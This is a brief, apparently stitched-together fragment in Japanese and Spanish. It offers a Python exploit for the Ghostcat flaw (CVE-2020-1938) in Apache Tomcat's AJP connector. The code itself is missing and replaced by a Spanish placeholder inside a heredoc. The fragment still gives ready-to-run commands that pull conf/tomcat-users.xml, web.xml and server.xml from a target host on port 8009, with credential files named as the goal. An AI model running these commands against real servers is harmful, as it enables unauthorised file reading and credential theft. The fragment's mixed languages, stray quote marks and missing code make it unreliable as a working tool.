
Python製のCVE-2020-1938(Ghostcat)エクスプロイト。AJPコネクタ(ポート8009)を介してApache Tomcatサーバーから任意のファイルを読み取り、設定ファイルや資格情報ファイルも取得可能です。
Ghostcat - CVE-2020-1938 Exploit AJPコネクタ(ポート8009)経由でTomcatのファイルを読み取ります 使用方法: python3 ghostcat.py [ファイル] """
cat > ghostcat.py << 'PYEOF' [AQUÍ VA EL CÓDIGO COMPLETO DE ARRIBA] PYEOF
chmod +x ghostcat.py
python3 ghostcat.py ejemplo.com conf/tomcat-users.xml 8009
python3 ghostcat.py ejemplo.com WEB-INF/web.xml 8009
python3 ghostcat.py ejemplo.com conf/server.xml 8009